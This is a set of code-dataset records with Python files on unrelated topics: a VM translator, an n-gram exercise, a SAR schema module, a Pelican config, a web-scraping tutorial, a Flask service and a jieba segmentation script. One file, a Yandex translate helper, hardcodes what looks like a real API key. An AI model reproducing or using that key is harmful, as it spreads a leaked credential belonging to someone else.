file\n            output_file.writelines(line + '\\n' for line in add_bootstrap())\n            for file in os.listdir(path):\n                if file.endswith('.vm'):\n                    translate_file(os.path.join(path, file), output_file)\n\n\nif __name__ == '__main__':\n    main()\n","sub_path":"project8.py","file_name":"project8.py","file_ext":"py","file_size_in_byte":16871,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"47549927","text":"import re\nimport operator\nfrom math import log, exp\n\n################# Question 1 #################\n# note that we can do without nltk.word_tokenize in this question\ninf = open('Lovers_on_Aran_messed.txt', 'r')\nouf = open('Lovers_on_Aran.txt', 'w')\nfor line in inf:\n\tif not re.match(pattern='^\\\s+$', string=line): # retain only non-empty lines\n\t\tline = re.sub('\\\s+', ' ', line) # replace successive spaces with 1 space\n\t\tline = re.sub('\\\s*(?P<punc>[!\\\?\\\.,])\\\s*', ' \\\g<punc> ', line) # add spaces around punctuations\n\t\touf.write(line.strip()+'\\n')\ninf.close()\nouf.close()\n\n################# Question 2 #################\ninf = open('Lovers_on_Aran.txt', 'r')\nouf = open('count_and_find.txt', 'w')\ncount = 0\ntgt_words = [] # target words\nfor line in inf:\n\tfor w in line.split():\n\t\tcount += 1\n\t\tif re.match(r'[A-Z]', w) or len(w) < 3:\n\t\t\ttgt_words.append(w)\nouf.write(str(count)+'\\n')\nfor w in tgt_words:\n\touf.write(w+'\\n')\ninf.close()\nouf.close()\n\n################# Question 3 #################\ninf = open('Lovers_on_Aran.txt', 'r')\nouf = open('trigram_prob.txt', 'w')\nsents = []\nfor line in inf:\n\tpadded_sent = '<s> ' * 2 + line + ' <\\\s>' * 2\n\tsplit_sent = padded_sent.lower().split()\n\tsents.append(split_sent)\n\ntri_dict = {} # a dict of trigram probs, with structure: {'w1w2':{'w3':prob, ...}, ...}\nfor sent in sents:\n\tfor i in range(0, len(sent) - 2):\n\t\tw1w2 = sent[i] + ' ' + sent[i+1]\n\t\tif w1w2 not in tri_dict:\n\t\t\ttri_dict[w1w2] = {}\n\t\tw3 = sent[i+2]\n\t\tif w3 not in tri_dict[w1w2]:\n\t\t\ttri_dict[w1w2][w3] = 0\n\t\ttri_dict[w1w2][w3] += 1\ntri_dict = {w1w2: {w3: count / sum(tri_dict[w1w2].values()) for w3, count in tri_dict[w1w2].items()} for w1w2 in tri_dict}\n\nsent_prob = {} # a dict of sentence probabilities, with structure: {lineID:prob, ...}\nfor i, sent in enumerate(sents):\n\tsent_prob[i] = round(exp(sum([log(tri_dict[sent[j]+' '+sent[j+1]][sent[j+2]]) for j in range(0, len(sent) - 2)])), 3) # use log probs\nsorted_sent_prob = sorted(sent_prob.items(), key=operator.itemgetter(1), reverse=True)\nfor id, prob in sorted_sent_prob:\n\touf.write('{}: {}\\n'.format(id, prob))","sub_path":"practical_session/prac5/prac5.py","file_name":"prac5.py","file_ext":"py","file_size_in_byte":2074,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"344971269","text":"\"\"\"\nThis package contains the CPHD schema\n\"\"\"\n\n__classification__ = 'UNCLASSIFIED'\n__author__ = \"Thomas McCullough\"\n\nimport os\nimport re\nfrom typing import List, Dict, Tuple, Union\n\n\n_CPHD_DEFAULT_TUPLE = (1, 1, 0)\n\n_the_directory = os.path.split(__file__)[0]\n\nurn_mapping = {\n    'urn:CPHD:0.3.0': {\n        'tuple': (0, 3, 0),\n        'version': '0.3.0',\n        'release': '0.3.0',\n        'date': ''},\n    'urn:CPHD:1.0.1': {\n        'tuple': (1, 0, 1),\n        'version': '1.0.1',\n        'release': '1.0.1',\n        'date': '2018-05-21T00:00:00Z',\n        'schema': os.path.join(_the_directory, 'CPHD_schema_V1.0.1_2018_05_21.xsd')},\n    'urn:CPHD:1.1.0': {\n        'tuple': (1, 1, 0),\n        'version': '1.1.0',\n        'release': '1.1.0',\n        'date': '2021-11-30T00:00:00Z',\n        'schema': os.path.join(_the_directory, 'CPHD_schema_V1.1.0_2021_11_30_FINAL.xsd')},\n}\nWRITABLE_VERSIONS = ('1.0.1', '1.1.0')\n\n# validate the defined paths\nfor key, entry in urn_mapping.items():\n    schema_path = entry.get('schema', None)\n    if schema_path is not None and not os.path.exists(schema_path):\n        raise ValueError('`{}` has nonexistent schema path {}'.format(key, schema_path))\n\n\ndef get_default_tuple() -> Tuple[int, int, int]:\n    \"\"\"\n    Get the default CPHD version tuple.\n\n    Returns\n    -------\n    Tuple[int, int, int]\n    \"\"\"\n\n    return _CPHD_DEFAULT_TUPLE\n\n\ndef get_default_version_string() -> str:\n    \"\"\"\n    Get the default CPHD version string.\n\n    Returns\n    -------\n    str\n    \"\"\"\n\n    return '{}.{}.{}'.format(*_CPHD_DEFAULT_TUPLE)\n\n\ndef get_namespace(version: Union[str, Tuple[int, int, int]]) -> str:\n    if isinstance(version, (list, tuple)):\n        version = '{}.{}.{}'.format(version[0], version[1], version[2])\n    return 'http://api.nsgreg.nga.mil/schema/cphd/{}'.format(version)\n\n\ndef check_urn(urn_string: str) -> str:\n    \"\"\"\n    Checks that the urn string follows the correct pattern.\n\n    Parameters\n    ----------\n    urn_string : str\n\n    Raises\n    ------\n    ValueError\n        This raises an exception for a poorly formed or unmapped CPHD urn.\n    \"\"\"\n\n    if not isinstance(urn_string, str):\n        raise TypeError(\n            'Expected a urn input of string type, got type {}'.format(type(urn_string)))\n\n    the_match = re.match(r'^\\\d.\\\d.\\\d$', urn_string)\n    if the_match is not None:\n        urn_string = 'urn:CPHD:{}'.format(urn_string)\n\n    the_match = re.match(r'^urn:CPHD:\\\d.\\\d.\\\d$', urn_string)\n    if the_match is None:\n        raise ValueError(\n            'Input provided as `{}`,\\nbut should be of the form '\n            '`urn:CPHD:<major>.<minor>.<release>'.format(urn_string))\n    return urn_string\n\n\ndef get_urn_details(urn_string: str) -> Dict[str, str]:\n    \"\"\"\n    Gets the associated details for the given CPHD urn, or raise an exception for\n    poorly formatted or unrecognized urn.\n\n    Parameters\n    ----------\n    urn_string : str\n\n    Returns\n    -------\n    Dict[str, str]\n    \"\"\"\n\n    
urn_string = check_urn(urn_string)\n out = urn_mapping.get(urn_string, None)\n\n if out is None:\n raise KeyError(\n 'Got correctly formatted, but unmapped CPHD urn {}.'.format(urn_string))\n return out\n\n\ndef get_schema_path(the_urn: str) -> str:\n \"\"\"\n Gets the path to the proper schema file for the given urn.\n\n Parameters\n ----------\n the_urn : str\n\n Returns\n -------\n str\n \"\"\"\n\n result = get_urn_details(the_urn)\n return result.get('schema', None)\n\n\ndef get_versions() -> List[str]:\n \"\"\"\n Gets a list of recognized CPHD urns.\n\n Returns\n -------\n List[str]\n \"\"\"\n\n return list(sorted(urn_mapping.keys(), key=lambda x: urn_mapping[x]['tuple']))\n","sub_path":"sarpy/io/phase_history/cphd_schema/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":3687,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"256397782","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*- #\nfrom __future__ import unicode_literals\n\nimport os.path\n\nAUTHOR = 'tvd'\nSITENAME = 'tvd.dev'\nSITEURL = ''\n\nPATH = 'content'\n\nTIMEZONE = 'US/Pacific'\n\nDEFAULT_LANG = 'en'\n\n# Feed generation is usually not desired when developing\nFEED_ALL_ATOM = None\nCATEGORY_FEED_ATOM = None\nTRANSLATION_FEED_ATOM = None\nAUTHOR_FEED_ATOM = None\nAUTHOR_FEED_RSS = None\n\nSOCIAL = (\n ('GitHub', 'https://github.com/thomasvandoren'),\n ('LinkedIn', 'https://www.linkedin.com/in/thomasvandoren'),\n ('Twitter', 'https://twitter.com/tvd0x2a'),\n)\n\nSTATIC_PATHS = [\n 'images',\n 'presentations',\n]\n\nDEFAULT_PAGINATION = 10\n\nTHEME = 'pelican-themes/tuxlite_tbs'\n","sub_path":"pelicanconf.py","file_name":"pelicanconf.py","file_ext":"py","file_size_in_byte":696,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"282965823","text":"import requests\nimport os\n\n\n# функция перевода текста\ndef translate_it(text):\n URL = 'https://translate.yandex.net/api/v1.5/tr.json/translate'\n API = 'trnsl.1.1.20200414T142315Z.82f7f234a435ac4f.5c0f9da21d5fd976283bc1c8447d85d38d7c6109'\n \n params = {\n 'key': API,\n 'text': text,\n 'lang': 'en-ru',\n }\n\n response = requests.get(URL, params=params)\n text = response.json()\n \n return text\n\n\nif __name__ == '__main__':\n print(translate_it('good'))","sub_path":"tests/ya_app.py","file_name":"ya_app.py","file_ext":"py","file_size_in_byte":514,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"508358029","text":"\n# coding: utf-8\n\n# In[1]:\n\n\nimport pandas as pd\n\n\n# In[2]:\n\n\ndf1 = pd.DataFrame([[\"James\",\"Robert\"],[\"James\",\"Robert\"],[\"James\",\"Andrew\"],[\"Robert\",\"James\"],[\"0101\",\"2020\"],[\"2020\",\"0101\"]],\n columns=[\"ColA\",\"ColB\"])\ndf1\n\n\n# In[3]:\n\n\ndf2 = df1.drop_duplicates()\ndf2\n\n\n# In[4]:\n\n\ndf2['ColC'] = df2.apply(lambda x: x['ColA'] + '_' + x['ColB'] if x['ColA'] >= x['ColB'] else x['ColB'] + '_' + x['ColA'], axis=1)\ndf2\n\n\n# In[5]:\n\n\ndf2.drop_duplicates(subset=[\"ColC\"])\n\n","sub_path":"Python/Elements/Pandas/pandas_undirected_edge_list.py","file_name":"pandas_undirected_edge_list.py","file_ext":"py","file_size_in_byte":483,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"449276693","text":"import urllib.request\r\n\r\ndef load_data():\r\n url = \"http://www.baidu.com/\"\r\n #get的请求\r\n #http请求\r\n #response:http相应的对象\r\n response = urllib.request.urlopen(url)\r\n 
print(response)\r\n    #读取内容 bytes类型\r\n    data = response.read()\r\n    print(data)\r\n    #将文件获取的内容转换成字符串\r\n    str_data = data.decode(\"utf-8\")\r\n    print(str_data)\r\n    #将数据写入文件\r\n    with open(\"baidu.html\",\"w\",encoding=\"utf-8\")as f:\r\n        f.write(str_data)\r\n    #将字符串类型转换成bytes\r\n    str_name = \"baidu\"\r\n    bytes_name =str_name.encode(\"utf-8\")\r\n    print(bytes_name)\r\n\r\n    #python爬取的类型:str bytes\r\n    #如果爬取回来的是bytes类型:但是你写入的时候需要字符串 decode(\"utf-8\")\r\n    #如果爬取过来的是str类型:但你要写入的是bytes类型 encode(\"utf-8\")\r\nload_data()\r\n\r\n","sub_path":"爬虫教程/urllib/爬虫第一节/01-url_opne_code.py","file_name":"01-url_opne_code.py","file_ext":"py","file_size_in_byte":874,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"598603132","text":"from datetime import datetime\nfrom sqlalchemy import or_, and_, desc\nfrom sqlalchemy.exc import SQLAlchemyError\nfrom app import db\nfrom app.models.exceptions import ServiceError\nfrom app.models.performance_phrases import PerformancePhrase\nfrom app.models.employee_to_review import EmployeeToReview\nfrom app.models.users import User\n\n\ndef find_all() -> [PerformancePhrase]:\n    return PerformancePhrase.query.all()\n\n\ndef find_filtered(current_performance_phrase: User, queryParams) -> []:\n    query_filter = queryParams.get('filter', {})\n    limit = int(queryParams.get('pageSize', 10))\n    offset = queryParams.get('pageNumber', 0) * limit\n    search_text = query_filter.get('searchText', '')\n    reviewed_by = query_filter.get('reviewedBy', None)\n    reviewed = query_filter.get('reviewed', None)\n    if reviewed is not None and reviewed_by is not None:\n        q1 = EmployeeToReview.query.filter(\n            and_(EmployeeToReview.reviewed_by == reviewed_by,\n                 EmployeeToReview.reviewed == reviewed,\n                 )).all()\n        not_in = []\n        for p in q1:\n            not_in.append(p.performance_phrase_id)\n\n        q = PerformancePhrase.query.filter(PerformancePhrase.id.notin_(not_in))\n        return q.offset(offset).limit(limit).all(), q.count()\n    else:\n        q = PerformancePhrase.query\n        return q.offset(offset).limit(limit).all(), q.count()\n\n\ndef find_one(performance_phrase_id: int) -> PerformancePhrase:\n    if performance_phrase_id is None:\n        raise ServiceError\n    return PerformancePhrase.query.filter_by(id=performance_phrase_id).first()\n\n\ndef save(performance_phrase_id: int, data: {}) -> PerformancePhrase:\n    try:\n        if performance_phrase_id is None:\n            performance_phrase = PerformancePhrase.from_args(\n                data.get('name') if data.get('name') != '' else None,\n                data.get('tag') if data.get('tag') != '' else None,\n                datetime.utcnow(),\n                datetime.utcnow()\n            )\n            db.session.add(performance_phrase)\n        else:\n            performance_phrase = find_one(performance_phrase_id)\n            performance_phrase.name = data.get('name')\n            performance_phrase.tag = data.get('tag')\n            performance_phrase.updated_at = datetime.now()\n        db.session.commit()\n\n        return performance_phrase\n    except SQLAlchemyError as e:\n        code, msg = e.orig.args\n        raise ServiceError\n\n\ndef delete(performance_phrase_id: int) -> bool:\n    if performance_phrase_id is None:\n        raise ServiceError\n    try:\n        performance_phrase = find_one(performance_phrase_id)\n        db.session.delete(performance_phrase)\n        db.session.commit()\n        return True\n    except SQLAlchemyError:\n        raise ServiceError\n\n","sub_path":"app/services/performance_phrase_service.py","file_name":"performance_phrase_service.py","file_ext":"py","file_size_in_byte":2791,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"534349508","text":"# -*- coding=utf-8 -*-\n''' \n 
","sub_path":"爬虫教程/urllib/爬虫第一节/01-url_opne_code.py","file_name":"01-url_opne_code.py","file_ext":"py","file_size_in_byte":874,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"}
{"seq_id":"598603132","text":"from datetime import datetime\nfrom sqlalchemy import or_, and_, desc\nfrom sqlalchemy.exc import SQLAlchemyError\nfrom app import db\nfrom app.models.exceptions import ServiceError\nfrom app.models.performance_phrases import PerformancePhrase\nfrom app.models.employee_to_review import EmployeeToReview\nfrom app.models.users import User\n\n\ndef find_all() -> [PerformancePhrase]:\n    return PerformancePhrase.query.all()\n\n\ndef find_filtered(current_performance_phrase: User, queryParams) -> []:\n    query_filter = queryParams.get('filter', {})\n    limit = int(queryParams.get('pageSize', 10))\n    offset = queryParams.get('pageNumber', 0) * limit\n    search_text = query_filter.get('searchText', '')\n    reviewed_by = query_filter.get('reviewedBy', None)\n    reviewed = query_filter.get('reviewed', None)\n    if reviewed is not None and reviewed_by is not None:\n        q1 = EmployeeToReview.query.filter(\n            and_(EmployeeToReview.reviewed_by == reviewed_by,\n                 EmployeeToReview.reviewed == reviewed,\n                 )).all()\n        not_in = []\n        for p in q1:\n            not_in.append(p.performance_phrase_id)\n\n        q = PerformancePhrase.query.filter(PerformancePhrase.id.notin_(not_in))\n        return q.offset(offset).limit(limit).all(), q.count()\n    else:\n        q = PerformancePhrase.query\n        return q.offset(offset).limit(limit).all(), q.count()\n\n\ndef find_one(performance_phrase_id: int) -> PerformancePhrase:\n    if performance_phrase_id is None:\n        raise ServiceError\n    return PerformancePhrase.query.filter_by(id=performance_phrase_id).first()\n\n\ndef save(performance_phrase_id: int, data: {}) -> PerformancePhrase:\n    try:\n        if performance_phrase_id is None:\n            performance_phrase = PerformancePhrase.from_args(\n                data.get('name') if data.get('name') != '' else None,\n                data.get('tag') if data.get('tag') != '' else None,\n                datetime.utcnow(),\n                datetime.utcnow()\n            )\n            db.session.add(performance_phrase)\n        else:\n            performance_phrase = find_one(performance_phrase_id)\n            performance_phrase.name = data.get('name')\n            performance_phrase.tag = data.get('tag')\n            performance_phrase.updated_at = datetime.now()\n        db.session.commit()\n\n        return performance_phrase\n    except SQLAlchemyError as e:\n        code, msg = e.orig.args\n        raise ServiceError\n\n\ndef delete(performance_phrase_id: int) -> bool:\n    if performance_phrase_id is None:\n        raise ServiceError\n    try:\n        performance_phrase = find_one(performance_phrase_id)\n        db.session.delete(performance_phrase)\n        db.session.commit()\n        return True\n    except SQLAlchemyError:\n        raise ServiceError\n\n","sub_path":"app/services/performance_phrase_service.py","file_name":"performance_phrase_service.py","file_ext":"py","file_size_in_byte":2791,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"}
{"seq_id":"534349508","text":"# -*- coding=utf-8 -*-\n''' \n    Update 6/6:\n    Benchmarked the speed: roughly 70 s per 10,000 records.\n    1. Added an option for the output directory:\n    python (--dic dictname) + other options + filename(dirname) outputname position \n    2. Word counting now supports regular expressions: every word in the dictionary is turned into\n    the regex (?<=\s)word(?=\s). Dictionary words that contain punctuation cannot be counted,\n    because punctuation in the segmentation output is separated by spaces on its own.\n    3. Generates an allinfo.txt that looks like this:\n    dictionary: xxxx.dict\n    filename, total dictionary word count, total text word count, record count\n    2013广元.csv, 10000, 10000, 200\n    2013广州.csv, 40000, 100000, 3000\n    4. Output file names are prefixed with the dictionary name.\n    \n    Update 5/26:\n    Fixed a bug that could occur with --pa.\n\n    Update 5/24:\n    1. Improved the word-counting feature.\n    2. Added the --pt option; with --pt, the time spent per 10,000 records processed is printed.\n    3. Added the --ocoding option; --ocoding utf-8 saves all output files as utf-8 (the default is utf-8).\n    \n    Note: mind the relationship between the input and output encodings. For example, if the input\n    file uses GB18030 and the output uses GB2312, errors occur, because GB2312 is effectively a\n    subset of GB18030: some characters that decode fine from GB18030 fail when encoded as GB2312.\n    \n    Update 5/22:\n    Re-fixed the escape-character issue.\n------------------------------------------------------ \n    Features:\n    Segmentation: with or without a dictionary.\n    Counting: none, count all words, or count dictionary words only.\n------------------------------------------------------\n    Usage:\n    python (--dic dictname) + other options + filename(dirname) outputname position \n    \n    position: the column to segment\n    \n    Other options:\n    --dic: followed by the dictionary name\n    --pa: segment + count the frequency of all words\n    --pd: segment + count only the words in the dictionary\n    --icoding: followed by the input file encoding, e.g. --icoding 'utf-8' \n    --title: add this if the source file has a header row; otherwise no header is assumed\n    --ocoding: the output file encoding\n\n    -a: count only, all words\n    -d: count only, dictionary words\n    -p: segment only, no counting\n    -g: also produce a global word-frequency file\n    \n    Note: some options take two leading dashes, others take one.\n------------------------------------------------------\n'''\n\n\nimport jieba\nimport jieba.analyse\nimport re\nimport io\nimport os\nimport time\nimport pickle\nimport copy\nimport getopt\nimport sys\nimport pandas\n\ndef getkey(x):\n    return x[1]\n\n\ndef read_topic(dirname):\n    print('loading the topic dictionary')\n    start = time.time()\n    word_topic = {}\n    for root,dir,files in os.walk(dirname):\n        for name in files:\n            level1 = re.split('/', root)[1]\n            level2 = re.split('\\.', name)[0]\n            with open(root + '/' + name, encoding='utf-8') as fr:\n                for item in fr:\n                    word_topic[item.strip()] = [level1, level2]\n    print('finished loading the topic dictionary')\n    print('elapsed {}s'.format(round(time.time()-start, 2)))\n    return word_topic\n\n\n
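# --- Editor's addition (illustrative sketch; the sample word and text are made up). ---\n# Shows how the dictionary patterns built in __main__ behave: each entry is wrapped\n# as (?<=\s)word(?=\s), so it only matches a token with a space on both sides of it\n# in the space-separated segmentation output.\ndef _demo_word_regex(word=u'weather', text=u' nice weather today weather '):\n    regex = re.compile('(?<=\\s){}(?=\\s)'.format(word))\n    return len(regex.findall(text))  # -> 2 for the defaults above\n\n\n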
def pure_part(filename, position):\n\n    chunk_size = 10000\n    name = re.split('/', filename)[-1]\n    fwname = outputname + '/p_res/{}_part_'.format(re.split('\\.', dicname)[0]) + name\n\n    if not os.path.isdir(outputname + '/p_res'):\n        os.mkdir(outputname + '/p_res')\n\n    print(name + \" segmentation started.\")\n    count_ = 0\n    if os.path.isfile(fwname):\n        print(fwname, \" segmentation result already exists, skipping\")\n        return\n    try:\n        with io.open(fwname, 'w', encoding=ocoding) as fw:\n            fr = pandas.read_csv(filename, encoding=infilecoding, iterator=True, error_bad_lines=False,\n                                 warn_bad_lines=True, header=None if not title else 0, dtype=str)\n            first = True\n            start = time.time()\n            while True:\n                name_pattern = re.compile(r'@.*?\\s|@.*?:|@.*?$|/|\\s|\\\\')\n                chunk = fr.get_chunk(chunk_size)\n                content_name = chunk.columns[position]\n                newcol = '微博类型'  # output column: Weibo post type\n\n                chunk.insert(len(chunk.columns), newcol, None)\n\n                for index, row in chunk.iterrows():\n                    count_ += 1\n                    content = row[content_name]\n                    if pandas.isnull(content):\n                        chunk.ix[index, content_name] = u''\n                        chunk.ix[index, newcol] = 0  # empty in the source\n                    elif not content.count(u'转发微博'):  # u'转发微博' is the retweet marker in the data\n                        content = name_pattern.sub('', content)\n                        words = jieba.lcut(content)\n                        jres = ' '.join(words)\n                        if jres.strip() == \"\":\n                            chunk.ix[index, newcol] = 2  # empty after stripping @-mentions\n                        else:\n                            chunk.ix[index, newcol] = 3  # normal post\n                        chunk.ix[index, content_name] = ' '.join(words).strip('\"')\n                    else:\n                        chunk.ix[index, content_name] = u''\n                        chunk.ix[index, newcol] = 1  # contains nothing but the retweet marker\n                chunk.to_csv(fw, encoding=ocoding, index=False, header=first and title, quoting=1)\n                if first:\n                    first = False\n                if pt:\n                    print('segmented {} records so far, elapsed {}s'.format(count_, round(time.time()-start, 2)))\n    except StopIteration:\n        print(name + \" segmentation finished.\")\n\n\ndef pure_count(dic, filename, position):\n    name = re.split('/', filename)[-1]\n\n    chunk_size = 10000\n    global g\n    if g:\n        global allsave\n\n    if not os.path.isdir(outputname + \"/count_res\"):\n        os.mkdir(outputname + \"/count_res\")\n\n    save = {}\n\n    wordnum_indic = 0\n    textnum = 0\n    wordnum = 0\n\n    with io.open(outputname + '/count_res/{}_count_'.format(re.split('\\.', dicname)[0]) + name, 'w', encoding=ocoding) as fw:\n        fr = pandas.read_csv(filename, encoding=infilecoding, iterator=True, error_bad_lines=False,\n                             warn_bad_lines=True, header=None if not title else 0, dtype=str)\n        fw.write(u'word,count\\n')\n        try:\n            if dic != {}:\n                save = copy.deepcopy(dic)\n            start = time.time()\n            while True:\n                chunk = fr.get_chunk(chunk_size)\n                content_name = chunk.columns[position]\n                chunk_str = \" \"\n\n                for index, row in chunk.iterrows():\n                    textnum += 1\n                    content = row[content_name]\n\n                    if not pandas.isnull(content) and dic != {} and (d or pd):\n                        chunk_str += \" \" + content.strip('\"')\n\n                    if not pandas.isnull(content):\n                        words = re.split(' ', content)\n                        wordnum += len(words)\n                    else:\n                        words = []\n\n                    if dic == {}:\n                        for word in words:\n                            if word not in save:\n                                save[word] = 1\n                            else:\n                                save[word] += 1\n                            if g:\n                                if word not in allsave:\n                                    allsave[word] = 1\n                                else:\n                                    allsave[word] += 1\n                # print('finished one row', time.time()-start)\n                if pt:\n                    print('counted {} records so far, elapsed {}s'.format(textnum, round(time.time()-start, 2)))\n\n                chunk_str += \" \"\n                if dic != {} and (d or pd):\n                    for word in word_regx:\n                        regex = word_regx[word]\n                        temp_num = len(regex.findall(chunk_str))\n                        if word in save:\n                            save[word] += temp_num\n                            wordnum_indic += temp_num\n                        if g:\n                            if word in allsave:\n                                allsave[word] += temp_num\n\n        except StopIteration:\n            print(name + ' counting finished.')\n\n        res = []\n        for key in save:\n            res.append([key, save[key]])\n        res.sort(key=getkey, reverse=True)\n        for item in res:\n            fw.write(item[0] + ',' + str(item[1]) + '\\n')\n    return \"{},{},{},{}\\n\".format(name, wordnum_indic, wordnum, textnum)\n\n\n
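# --- Editor's addition (a hedged sketch; 'some.csv' is a placeholder path). ---\n# Both counting paths above rely on pandas' chunked reader: read_csv(iterator=True)\n# returns a reader whose get_chunk(n) hands back n rows at a time and raises\n# StopIteration at end of file, which is exactly what the try/except blocks here exploit.\ndef _demo_chunked_read(path='some.csv', chunk_size=10000):\n    reader = pandas.read_csv(path, iterator=True, dtype=str)\n    try:\n        while True:\n            yield len(reader.get_chunk(chunk_size))  # rows per chunk\n    except StopIteration:\n        return\n\n\n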
def part_count(filename, position, dic):\n\n    name = re.split('/', filename)[-1]\n    fwname = outputname + '/p_res/{}_part_'.format(re.split('\\.', dicname)[0]) + name\n    chunk_size = 20000\n    wordnum_indic = 0\n    textnum = 0\n    wordnum = 0\n\n    global g\n    if g:\n        global allsave\n    save = {}\n\n    if not os.path.isdir(outputname + \"/p_res\"):\n        os.mkdir(outputname + \"/p_res\")\n    if not os.path.isdir(outputname + \"/count_res\"):\n        os.mkdir(outputname + \"/count_res\")\n\n    print(name + \" segmentation + counting started.\")\n    if os.path.isfile(fwname):\n        print(fwname, \"segmentation already exists, counting only\")\n        # the segmentation file exists, so only count\n        pure_count(dic, fwname, position)\n\n    else:\n        try:\n            if dic != {}:\n                save = copy.deepcopy(dic)\n\n            with io.open(fwname, 'w', encoding=ocoding) as fw:\n                fr = pandas.read_csv(filename, encoding=infilecoding, iterator=True, error_bad_lines=False,\n                                     warn_bad_lines=True, header=None if not title else 0, dtype=str)\n                first = True\n                start = time.time()\n                while True:\n                    name_pattern = re.compile(r'@.*?\\s|@.*?:|@.*?$|/|\\s|\\\\')\n                    chunk = fr.get_chunk(chunk_size)\n                    content_name = chunk.columns[position]\n                    newcol = '微博类型'  # output column: Weibo post type\n                    chunk.insert(len(chunk.columns), newcol, None)\n                    chunk_str = \" \"\n                    for index, row in chunk.iterrows():\n                        words = []\n                        textnum += 1\n                        content = row[content_name]\n                        if pandas.isnull(content):\n                            chunk.ix[index, content_name] = u''\n                            chunk.ix[index, newcol] = 0  # empty in the source\n                        elif not content.count(u'转发微博'):  # u'转发微博' is the retweet marker in the data\n                            content = name_pattern.sub('', content)\n                            words = jieba.lcut(content)\n                            jres = ' '.join(words).strip('\"')\n                            if jres.strip() == \"\":\n                                chunk.ix[index, newcol] = 2  # empty after stripping @-mentions\n                            else:\n                                chunk_str += \" \" + jres\n                                wordnum += len(words)\n                                chunk.ix[index, newcol] = 3  # normal post\n                            chunk.ix[index, content_name] = jres\n                        else:\n                            chunk.ix[index, content_name] = u''\n                            chunk.ix[index, newcol] = 1  # contains nothing but the retweet marker\n\n                        if dic == {}:\n                            for word in words:\n                                if word not in save:\n                                    save[word] = 1\n                                else:\n                                    save[word] += 1\n                                if g:\n                                    if word not in allsave:\n                                        allsave[word] = 1\n                                    else:\n                                        allsave[word] += 1\n\n                    chunk.to_csv(fw, encoding=ocoding, index=False, header=first and title, quoting=1)\n\n                    chunk_str += \" \"\n                    if dic != {} and (d or pd):\n                        for word in word_regx:\n                            regex = word_regx[word]\n                            temp_num = len(regex.findall(chunk_str))\n                            if word in save:\n                                save[word] += temp_num\n                                wordnum_indic += temp_num\n                            if g:\n                                if word in allsave:\n                                    allsave[word] += temp_num\n                    if pt:\n                        print('segmented + counted {} records so far, elapsed {}s'.format(textnum, round(time.time() - start, 2)))\n\n                    if first:\n                        first = False\n\n        except StopIteration:\n            print(name + \" segmentation + counting finished\")\n\n        with io.open(outputname + '/count_res/{}_count_part_'.format(re.split('\\.', dicname)[0]) + name, 'w', encoding=ocoding) as fw:\n            fw.write(u'word,count\\n')\n            res = []\n            for key in save:\n                res.append([key, save[key]])\n            res.sort(key=getkey, reverse=True)\n            for item in res:\n                fw.write(item[0] + ',' + str(item[1]) + '\\n')\n\n    return \"{},{},{},{}\\n\".format(name, wordnum_indic, wordnum, textnum)\n\n
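# --- Editor's usage note (paths and the dictionary name below are hypothetical). ---\n# Example invocations, matching the option parsing in __main__ below:\n#   segment + count dictionary words, GB18030 input with a header row:\n#     python count_all_0605_re.py --dic mydict.txt --pd --icoding gb18030 --title data.csv out 3\n#   count-only over every file in a directory, counting all words:\n#     python count_all_0605_re.py -a data_dir out 3\n\n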
if __name__ == '__main__':\n    all_start = time.time()\n\n    options, args = getopt.getopt(sys.argv[1:], \"gapd\", [\"dic=\", \"pa\", \"pd\", \"icoding=\", 'title', 'pt', 'ocoding='])\n\n    position = -1\n    filename = \"\"\n    dicname = \"\"\n    dic = {}\n    allsave = {}\n    all_info = []\n    g = False\n    a = False\n    d = False\n    p = False\n    pa = False\n    pd = False\n    title = False\n    pt = False\n\n\n\n    dictcoding = 'utf-8'\n    infilecoding = 'utf-8'\n    ocoding = 'utf-8'\n\n    filename = args[0]\n    outputname = args[1]\n    position = int(args[2])\n    word_regx = {}\n\n\n    for o, a_ in options:\n        if o == '--dic':\n            dicname = a_\n            print(\"loading dictionary\", dicname)\n        if o == '-g':\n            g = True\n            print(\"a global word-frequency file will be produced\")\n\n        if o == '-a':\n            a = True\n            print('count only: all word frequencies')\n\n        # count only the frequencies of dictionary words\n        if o == '-d':\n            d = True\n            print('count only: dictionary word frequencies')\n\n        # segment only, no counting\n        if o == '-p':\n            p = True\n            print('segment only, no counting')\n\n        # segment + count all word frequencies\n        if o == '--pa':\n            pa = True\n            print('segment + count all word frequencies')\n\n        # segment + count dictionary word frequencies\n        if o == '--pd':\n            pd = True\n            print('segment + count dictionary word frequencies')\n\n        if o == '--icoding':\n            infilecoding = a_\n\n        if o == '--title':\n            title = True\n\n        if o == '--pt':\n            pt = True\n\n        if o == '--ocoding':\n            ocoding = a_\n\n    if (d or pd) and dicname == \"\":\n        print(\"please supply a dictionary, otherwise none will be used\")\n\n\n    print('input file encoding: {}'.format(infilecoding))\n    print('output file encoding: {}'.format(ocoding))\n\n    # load the dictionary\n    if dicname != \"\":\n        if p or pd:\n            jieba.load_userdict(dicname)\n        with io.open(dicname, 'r', encoding='utf-8') as fr:\n            for line in fr:\n                line = line.strip('\\n')\n                dic[line] = 0\n                word_regx[line.strip()] = re.compile('(?<=\\s){}(?=\\s)'.format(line))\n        if g:\n            allsave = copy.deepcopy(dic)\n    else:\n        print(\"no dictionary loaded\")\n\n\n    if os.path.isdir(filename):\n        for root, dir, file in os.walk(filename):\n            for name in file:\n                filedir = root + '/' + name\n                filestart = time.time()\n                # count only, no segmentation\n                if a or d:\n                    all_info.append(pure_count(dic, filedir, position))\n                # segment only, no counting\n                if p:\n                    pure_part(filedir, position)\n                # segment + count\n                if 